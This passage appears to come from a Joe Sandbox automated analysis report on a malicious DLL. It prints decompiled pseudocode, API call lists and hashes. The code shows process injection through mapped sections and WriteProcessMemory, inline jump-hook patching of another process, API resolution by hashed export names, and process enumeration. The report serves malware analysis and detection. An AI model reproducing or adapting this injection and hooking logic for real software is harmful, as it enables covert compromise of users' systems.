				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x2e5faa0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x2e5faa0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x2e5faa0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x2e5faa0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x2e5faa0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x2e5faa0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD33(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}

0x1000d01f
0x1000d029
0x1000d035
0x1000d03a
0x1000d03f
0x1000d3ff
0x1000d3ff
0x1000d04c
0x1000d052
0x1000d057
0x1000d05d
0x1000d06d
0x1000d079
0x1000d079
0x1000d082
0x1000d088
0x1000d08a
0x1000d093
0x1000d093
0x1000d09f
0x1000d0a3
0x1000d0a8
0x1000d0ae
0x1000d0b7
0x1000d0c5
0x1000d0cc
0x1000d0d1
0x1000d0d1
0x1000d0d2
0x1000d0b9
0x1000d0b9
0x1000d0b9
0x1000d0d8
0x1000d0de
0x1000d0e3
0x1000d0e9
0x1000d0f1
0x1000d0fb
0x1000d108
0x1000d113
0x1000d11b
0x1000d13c
0x1000d13e
0x1000d13e
0x1000d140
0x1000d14a
0x1000d156
0x1000d166
0x1000d16c
0x1000d172
0x1000d174
0x1000d185
0x1000d18b
0x1000d191
0x1000d196
0x1000d19c
0x1000d1a2
0x1000d1a7
0x1000d1ac
0x1000d1ac
0x1000d1b2
0x1000d1b2
0x1000d1bb
0x1000d1c7
0x1000d1cf
0x1000d1d3
0x1000d1d3
0x1000d1cf
0x1000d1d7
0x1000d1dd
0x1000d1e3
0x1000d1ea
0x1000d1fb
0x1000d201
0x1000d209
0x1000d210
0x1000d212
0x1000d223
0x1000d229
0x1000d22e
0x1000d231
0x1000d234
0x1000d23a
0x1000d240
0x1000d242
0x1000d248
0x1000d251
0x1000d254
0x1000d254
0x1000d257
0x1000d25f
0x1000d26a
0x1000d270
0x1000d261
0x1000d263
0x1000d263
0x1000d279
0x1000d279
0x1000d27f
0x1000d287
0x1000d292
0x1000d297
0x1000d29d
0x1000d29f
0x1000d2ac
0x1000d2ad
0x1000d2ae
0x1000d2b9
0x1000d2bb
0x1000d2c2
0x1000d2c2
0x1000d2cc
0x1000d2d1
0x1000d2d6
0x1000d2d6
0x1000d2dc
0x1000d2e3
0x1000d2e4
0x1000d2f1
0x1000d304
0x1000d309
0x1000d30e
0x1000d317
0x1000d317
0x1000d31d
0x1000d322
0x1000d328
0x1000d32e
0x1000d333
0x1000d33c
0x1000d33e
0x1000d345
0x1000d345
0x1000d34b
0x1000d353
0x1000d358
0x1000d359
0x1000d35e
0x1000d367
0x1000d369
0x1000d374
0x1000d374
0x1000d37d
0x1000d385
0x1000d38c
0x1000d391
0x1000d3a0
0x1000d3b8
0x1000d3bf
0x1000d3cd
0x1000d3df
0x1000d3e6
0x1000d3ee
0x1000d3f3
0x00000000

APIs

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetCurrentProcessId.KERNEL32 ref: 1000D046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
GetCurrentProcess.KERNEL32 ref: 1000D09F
LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
GetLastError.KERNEL32 ref: 1000D13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
GetLastError.KERNEL32 ref: 1000D172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
GetCurrentProcess.KERNEL32 ref: 1000D20E

Part of subcall function 1000BA62: CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06

memset.MSVCRT ref: 1000D229
GetVersionExA.KERNEL32(00000000), ref: 1000D234
GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
GetSystemInfo.KERNEL32(?), ref: 1000D26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287

Strings

TEMP, xrefs: 1000D328, 1000D333, 1000D344
SystemDrive, xrefs: 1000D353, 1000D35E, 1000D373
USERPROFILE, xrefs: 1000D2E4, 1000D312
%s\%s, xrefs: 1000D2F9
TEMP, xrefs: 1000D2F3

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 1475707489-2706916422
Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 1000C6C0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200
nativeregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E1000C6C0(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x2de0590
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x2e5fbc8
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
					if(_t106 != 0) {
						DestroyWindow(_t106); // executed
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E10008669( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E1000861A( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x2de0590
					 *0x1001e688 = _t131;
					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C63F(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}

0x1000c6c6
0x1000c6cd
0x1000c6cf
0x1000c6d1
0x1000c6d3
0x1000c6d6
0x1000c6d9
0x1000c6dc
0x1000c6df
0x1000c6e2
0x1000c6e5
0x1000c6ef
0x1000c6f2
0x1000c6f9
0x1000c6fe
0x1000c6fe
0x1000c704
0x1000c706
0x1000c70f
0x1000c8b5
0x1000c8b9
0x1000c8be
0x1000c8c4
0x1000c8c7
0x1000c8c7
0x1000c8cb
0x1000c8d0
0x1000c8e2
0x1000c8e2
0x1000c8eb
0x1000c8f5
0x1000c8f5
0x1000c8fc
0x1000c8fc
0x1000c71e
0x1000c738
0x00000000
0x00000000
0x1000c743
0x1000c74d
0x1000c757
0x1000c75a
0x1000c760
0x1000c767
0x1000c768
0x1000c769
0x1000c772
0x1000c773
0x1000c774
0x1000c776
0x1000c779
0x1000c77c
0x1000c77f
0x1000c782
0x1000c78e
0x1000c7b0
0x1000c7b8
0x1000c7bb
0x1000c7c6
0x1000c7c6
0x1000c7b8
0x1000c7f1
0x1000c8b2
0x00000000
0x1000c7f7
0x1000c803
0x1000c818
0x00000000
0x00000000
0x1000c82e
0x1000c830
0x1000c837
0x00000000
0x00000000
0x1000c848
0x1000c85f
0x1000c86f
0x1000c87b
0x1000c880
0x1000c886
0x1000c896
0x1000c8a2
0x1000c8aa
0x00000000
0x1000c8aa

APIs

NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
RegisterClassExA.USER32 ref: 1000C785
CreateWindowExA.USER32 ref: 1000C7B0
DestroyWindow.USER32 ref: 1000C7BB
UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
NtClose.NTDLL(00000000), ref: 1000C8F5

Strings

cdcdwqwqwq, xrefs: 1000C76A
sadccdcdsasa, xrefs: 1000C73E
0, xrefs: 1000C74D

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 2002808388-2319545179
Opcode ID: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
Opcode Fuzzy Hash: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10005F82, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E100085EF();
				_t19 = E1000980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E10008F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x1001e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E100095C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E100085C2( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E10012A5B( *0x1001e69c);
						 *_t55 = 0x7c3;
						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E100095E1(0x1001ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E100085D5();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
							 *0x1001e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E100085D5();
					}
					goto L10;
				}
			}

0x10005f82
0x10005f92
0x10005f9c
0x100060d0
0x100060c3
0x00000000
0x100060c5
0x100060d7
0x10006098
0x00000000
0x10006098
0x10005fa2
0x10005faa
0x10005fb1
0x10005fb3
0x00000000
0x10005fc6
0x10005fc6
0x10005fcc
0x10005fd2
0x10005fe2
0x10005fe7
0x10005fef
0x10005ff7
0x10006013
0x10006018
0x1000601b
0x1000601d
0x1000601f
0x1000602c
0x10006035
0x1000603e
0x10006043
0x10006044
0x10006052
0x1000605c
0x1000606d
0x10006072
0x10006079
0x10006080
0x10006083
0x1000608f
0x10006090
0x1000609c
0x100060a5
0x100060b7
0x100060ba
0x100060c1
0x00000000
0x00000000
0x00000000
0x100060c1
0x10006092
0x10006097
0x00000000
0x10005ff7

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
SetLastError.KERNEL32(000000AA), ref: 100060D7

Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839

GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
GetLastError.KERNEL32 ref: 10005FEF
memset.MSVCRT ref: 10006013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
GetFileAttributesW.KERNEL32(00000000), ref: 10006083
CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7

Strings

Hello qqq, xrefs: 10005F8D

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 3435743081-3610097158
Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB77, Relevance: 7.6, APIs: 5, Instructions: 105
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				void* _v568;
				void _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744 = 0x10002;
						_push( &_v744);
						_t43 =  *0x1001e684; // 0x2e5faa0
						_push(_t73[1]);
						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
							_t70 = _v568;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x2e5faa0
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E1000861A(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}

0x1000cb83
0x1000cb85
0x1000cb87
0x1000cb90
0x1000cb9b
0x1000cba0
0x1000cba4
0x1000cbb8
0x1000cbc0
0x1000cbd0
0x1000cbd1
0x1000cbd6
0x1000cbe1
0x1000cbe7
0x1000cbef
0x1000cbfd
0x1000cc03
0x1000cc04
0x1000cc10
0x1000cc17
0x1000cc27
0x1000cc67
0x1000cc67
0x1000cc46
0x1000cc46
0x1000cc65
0x00000000
0x00000000
0x1000cc65
0x1000cc27
0x1000cbe1
0x1000cba4
0x1000cc69
0x1000cc70
0x1000cc73
0x1000cc79
0x1000cc79
0x1000cc80
0x1000cc87
0x1000cc8a
0x1000cc8f
0x1000cc9c
0x1000cca2
0x1000cca9

APIs

Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605

FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6

memset.MSVCRT ref: 1000CBB8
NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
String ID:
API String ID: 317994034-0
Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABA3, Relevance: 7.6, APIs: 5, Instructions: 65
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000ABA3(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x2e5faa0
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x2e5faa0
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}

0x1000aba3
0x1000abbb
0x1000abbd
0x1000abc0
0x1000abc2
0x1000abc7
0x1000abd6
0x1000abde
0x1000abf2
0x1000ac02
0x1000ac08
0x1000ac0d
0x1000ac13
0x00000000
0x00000000
0x1000ac15
0x1000ac26
0x00000000
0x00000000
0x00000000
0x1000ac26
0x1000ac2e
0x1000ac35
0x1000abf4
0x1000abf4
0x1000abfa
0x1000abff
0x1000abff
0x1000abf2
0x1000ac3e

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
memset.MSVCRT ref: 1000ABD6
Process32First.KERNEL32(00000000,?), ref: 1000ABED
Process32Next.KERNEL32(00000000,?), ref: 1000AC21
CloseHandle.KERNEL32(00000000), ref: 1000AC2E

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
String ID:
API String ID: 1267121359-0
Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x1000dfb6
0x1000dfb8
0x1000dfbb
0x1000dfbe
0x1000dfc4
0x1000e021
0x00000000
0x1000e021
0x1000dfc6
0x1000dfd1
0x1000dfd4
0x1000dfd9
0x1000dfde
0x1000dfe1
0x1000dfe3
0x1000dfe6
0x1000dfe9
0x1000dfee
0x00000000
0x00000000
0x00000000
0x00000000
0x1000dff0
0x1000dff0
0x1000e002
0x1000e00f
0x1000e013
0x00000000
0x00000000
0x1000e015
0x1000e018
0x1000e019
0x1000e01f
0x00000000
0x00000000
0x00000000
0x1000e01f
0x1000e036
0x1000e03b
0x1000e03f
0x00000000
0x1000e04b
0x1000e04b
